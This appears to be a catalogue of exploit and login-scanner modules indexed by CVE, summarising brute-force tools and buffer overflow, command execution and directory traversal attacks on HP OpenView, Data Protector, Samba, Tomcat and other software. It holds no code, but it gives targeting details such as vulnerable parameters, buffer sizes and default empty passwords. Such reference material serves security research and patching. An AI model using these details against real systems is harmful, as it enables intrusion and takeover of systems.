|
CVE-1999-0502
DB2 Authentication Brute Force Utility
|
|
This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. |
|
CVE-1999-0502
FTP Authentication Scanner
|
|
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. |
|
CVE-1999-0502
Dell iDRAC default Login
|
|
This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85 |
|
CVE-1999-0502
DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility
|
|
This module attempts to authenticate to different DLink HTTP management services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615 Hardware revision D and D-Link DIR-320 devices. It is possible that this module also works with other models. |
|
CVE-1999-0502
DLink DIR-615H HTTP Login Utility
|
|
This module attempts to authenticate to different DLink HTTP management services. It has been tested successfully on D-Link DIR-615 Hardware revision H devices. It is possible that this module also works with other models. |
|
CVE-1999-0502
DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
|
|
This module attempts to authenticate to different DLink HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices.It is possible that this module also works with other models. |
|
CVE-1999-0502
HTTP Login Utility
|
|
This module attempts to authenticate to an HTTP service. |
|
CVE-1999-0502
Tomcat Application Manager Login Utility
|
|
This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. |
|
CVE-1999-0502
MySQL Login Utility
|
|
This module simply queries the MySQL instance for a specific user/pass (default is root with blank). |
|
CVE-1999-0502
Oracle RDBMS Login Utility
|
|
This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. |
|
CVE-1999-0502
PcAnywhere Login Scanner
|
|
This module will test pcAnywhere logins on a range of machines and report successful logins. |
|
CVE-1999-0502
PostgreSQL Login Utility
|
|
This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. |
|
CVE-1999-0502
rexec Authentication Scanner
|
|
This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). |
|
CVE-1999-0502
rlogin Authentication Scanner
|
|
This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). |
|
CVE-1999-0502
rsh Authentication Scanner
|
|
This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024). |
|
CVE-1999-0502
SSH Login Check Scanner
|
|
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. |
|
CVE-1999-0502
Telnet Login Check Scanner
|
|
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. |
|
CVE-1999-0502
VMWare Authentication Daemon Login Scanner
|
|
This module will test vmauthd logins on a range of machines and report successful logins. |
|
CVE-1999-0502
VMWare Web Login Scanner
|
|
This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI |
|
CVE-1999-0502
WinRM Login Utility
|
|
This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the 'AllowUnencrypted' winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate. |
|
CVE-1999-0502
SSH User Code Execution
|
|
This module utilizes a stager to upload a base64 encoded binary which is then decoded, chmod'ed and executed from the command shell. |
|
CVE-2000-0573
WU-FTPD SITE EXEC/INDEX Format String Vulnerability
|
|
This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code. |
|
CVE-2001-0311
HP OpenView OmniBack II Command Execution
|
|
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows. |
|
CVE-2001-0797
System V Derived /bin/login Extraneous Arguments Buffer Overflow
|
|
This exploit connects to a system's modem over dialup and exploits a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. |
|
CVE-2001-0797
Solaris in.telnetd TTYPROMPT Buffer Overflow
|
|
This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon. |
|
CVE-2002-1318
Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
|
|
This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: "Bug in the length checking for encrypted password change requests from clients." The bug was discovered and reported by the Debian Samba Maintainers. |
|
CVE-2002-1473
HP-UX LPD Command Execution
|
|
This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213. |
|
CVE-2003-0201
Samba trans2open Overflow (*BSD x86)
|
|
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. |
|
CVE-2003-0201
Samba trans2open Overflow (Linux x86)
|
|
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. |
|
CVE-2003-0201
Samba trans2open Overflow (Mac OS X PPC)
|
|
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems. |
|
CVE-2003-0201
Samba trans2open Overflow (Solaris SPARC)
|
|
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module. |
|
CVE-2003-0694
Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
|
|
This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan() method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution. |
|
CVE-2005-2773
HP Openview connectedNodes.ovpl Remote Command Execution
|
|
This module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen. |
|
CVE-2007-1819
HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
|
|
This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code. |
|
CVE-2007-2280
HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
|
|
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one. |
|
CVE-2007-3872
HP OpenView Operations OVTrace Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50. By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. |
|
CVE-2007-5208
HPLIP hpssd.py From Address Arbitrary Command Execution
|
|
This module exploits a command execution vulnerable in the hpssd.py daemon of the Hewlett-Packard Linux Imaging and Printing Project. According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable. This module was written and tested using the Fedora 6 Linux distribution. On the test system, the daemon listens on localhost only and runs with root privileges. Although the configuration shows the daemon is to listen on port 2207, it actually listens on a dynamic port. NOTE: If the target system does not have a 'sendmail' command installed, this vulnerability cannot be exploited. |
|
CVE-2007-6204
HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code. |
|
CVE-2007-6530
HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
|
|
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. By passing an overly long string to the AddFolder method, an attacker may be able to execute arbitrary code. |
|
CVE-2008-0067
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code. |
|
CVE-2008-1661
DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
|
|
This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs. |
|
CVE-2008-1697
HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically this vulnerability is caused by a failure to properly handle user supplied input within the HTTP request including headers and the actual URL GET request. Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode which was alphanumeric encoded by muts in the original exploit. If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably some timeout handling code that causes this. |
|
CVE-2009-0920
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works against a specific build (ie. NNM 7.53_01195) |
|
CVE-2009-2685
Hewlett-Packard Power Manager Administration Buffer Overflow
|
|
This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2. Sending a specially crafted POST request with an overly long Login string, an attacker may be able to execute arbitrary code. |
|
CVE-2009-3693
Persits XUpload ActiveX MakeHttpRequest Directory Traversal
|
|
This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5. By passing a string containing "..\" sequences to the MakeHttpRequest method, an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory. You may want to combine this module with the use of multi/handler since a user would have to log for the payloda to execute. |
|
CVE-2009-3843
Tomcat Application Manager Login Utility
|
|
This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. |
|
CVE-2009-3843
Apache Tomcat Manager Application Deployer Authenticated Code Execution
|
|
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. |
|
CVE-2009-3844
HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
|
|
This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the second one. |
|
CVE-2009-3849
HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code. |
|
CVE-2009-3999
HP Power Manager 'formExportDataLogs' Buffer Overflow
|
|
This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), which may result aribitrary remote code execution under the context of 'SYSTEM'. |
|
CVE-2009-4178
HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute arbitrary code. |
|
CVE-2009-4179
HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to "sprintf_new" in the "isWide" function within "ovalarm.exe". A stack buffer overflow occurs when processing an HTTP request that contains the following. 1. An "Accept-Language" header longer than 100 bytes 2. An "OVABverbose" URI variable set to "on", "true" or "1" The vulnerability is related to "_WebSession::GetWebLocale()" .. NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload. |
|
CVE-2009-4188
Tomcat Application Manager Login Utility
|
|
This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. |
|
CVE-2009-4188
Apache Tomcat Manager Application Deployer Authenticated Code Execution
|
|
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. |
|
CVE-2009-4189
Tomcat Application Manager Login Utility
|
|
This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass. |
|
CVE-2009-4189
Apache Tomcat Manager Application Deployer Authenticated Code Execution
|
|
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. |
|
CVE-2010-1552
HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold. It is important to note that this vulnerability must be exploited by overwriting SEH. While the saved return address can be smashed, a function call that occurs before the function returns calls "exit". |
|
CVE-2010-1553
HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
|
|
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code. |
|
CVE-2010-1554
HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow
|
|
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code. |
|
CVE-2010-1555
HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow
|
|
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted Hostname parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code. |
|
CVE-2010-1960
HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder. |
|
CVE-2010-1961
HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either. |
|
CVE-2010-1964
HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either. |
|
CVE-2010-2703
HP OpenView Network Node Manager execvp_nc Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel' parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is not triggerable via a GET request due to limitations on the request size. The buffer being targetted is 16384 bytes in size. There are actually two adjacent buffers that both get overflowed (one into the other), and strcat is used. The vulnerable code is within the "execvp_nc" function within "ov.dll" prior to v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. This vulnerability might also be triggerable via other CGI programs, however this was not fully investigated. |
|
CVE-2010-2709
HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow a stack buffer and execute arbitrary code. The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is declared within this function. When the vulnerability is triggered, the stack trace looks like the following: #0 ... #1 sprintf_new(local_stack_buf, fmt, cooke); #2 OvWwwDebug(" HTTP_COOKIE=%s\n", cookie); #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x); #4 sub_405ee0("nnm", "webappmon"); No validation is done on the cookie argument. There are no stack cookies, so exploitation is easily achieved by overwriting the saved return address or SEH frame. The original advisory detailed an attack vector using the "OvJavaLocale" cookie being passed in a request ot "webappmon.exe". Further research shows that several different cookie values, as well as several different CGI applications, can be used. ' |
|
CVE-2010-3007
HP Data Protector DtbClsLogin Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The overflow occurs during the login process, in the DtbClsLogin function provided by the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an insecure way with the username. A successful exploitation will lead to code execution with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default. |
|
CVE-2011-0266
HP OpenView NNM nnmRptConfig nameParams Buffer Overflow
|
|
This module exploits a vulnerability in HP NNM's nnmRptConfig.exe. A remote user can send a long string data to the nameParams parameter via a POST request, which causes an overflow on the stack when function ov.sprintf_new() is used, and gain arbitrary code execution.' |
|
CVE-2011-0267
HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow
|
|
This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution. |
|
CVE-2011-0276
HP OpenView Performance Insight Server Backdoor Account Code Execution
|
|
This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the com.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system allowing the execution of arbitary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0 |
|
CVE-2011-0514
HP Data Protector Manager RDS DOS
|
|
This module causes a remote DOS on HP Data Protector's RDS service. By sending a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous size for malloc(). |
|
CVE-2011-0923
HP Data Protector 6.1 EXEC_CMD Command Execution
|
|
This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW(). If the file is found, the process will then go ahead execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() will throw an error (0x03), and then bails early without triggering CreateProcess(). Because of these behaviors, if you try to supply an argument, FindFirstFileW() will look at that as part of the filename, and then bail. Please note that when you specify the 'CMD' option, the base path begins under C:\. |
|
CVE-2011-0923
HP Data Protector 6 EXEC_CMD Remote Code Execution
|
|
This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, this allows arbitrary remote code execution under the context of root. |
|
CVE-2011-1865
HP OmniInet.exe Opcode 27 Buffer Overflow
|
|
This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code. |
|
CVE-2011-1865
HP OmniInet.exe Opcode 20 Buffer Overflow
|
|
This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default. |
|
CVE-2011-2404
HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution
|
|
This module allows remote attackers to place arbitrary files on a users file system by abusing via Directory Traversal attack the "saveXML" method from the "XMLSimpleAccessor" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista. |
|
CVE-2011-3167
HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function "_OVConcatPath" which finally uses "strcat" in a insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path. If the installation path cannot be guessed the default installation path is used. |
|
CVE-2011-4786
HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution
|
|
This module allows remote attackers to place arbitrary files on a users file system by abusing the "CacheDocumentXMLWithId" method from the "XMLCacheMgr" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista. |
|
CVE-2011-4789
HP Diagnostics Server magentservice.exe Overflow
|
|
This module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. Originally found and posted by AbdulAziz Harir via ZDI. |
|
CVE-2012-0124
HP Data Protector Create New Folder Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP Data Protector 5. The overflow occurs in the creation of new folders, where the name of the folder is handled in a insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the folder name is split in fragments in this insecure copy. Because of this, this module uses egg hunting to search a non corrupted copy of the payload in the heap. On the other hand the overflowed buffer is stored in a frame protected by stack cookies, because of this SEH handler overwrite is used. Any user of HP Data Protector Express is able to create new folders and trigger the vulnerability. Moreover, in the default installation the 'Admin' user has an empty password. Successful exploitation will lead to code execution with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default. |
|
CVE-2012-2019
HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
|
|
This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x34 opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe components runs only for localhost by default, network access must be granted through its configuration to be remotely exploitable. On the other hand it runs on a random TCP port, to make easier reconnaissance a check function is provided. |
|
CVE-2012-2020
HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
|
|
This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x8c opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe components runs only for localhost by default, network access must be granted through its configuration to be remotely exploitable. On the other hand it runs on a random TCP port, to make easier reconnaissance a check function is provided. |
|
CVE-2012-5201
HP Intelligent Management Center Arbitrary File Upload
|
|
This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in a insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. |
|
CVE-2012-5202
HP Intelligent Management FaultDownloadServlet Directory Traversal
|
|
This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the FaultDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. |
|
CVE-2012-5203
HP Intelligent Management ReportImgServlt Directory Traversal
|
|
This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the ReportImgServlt, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. |
|
CVE-2012-5204
HP Intelligent Management IctDownloadServlet Directory Traversal
|
|
This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the IctDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. |
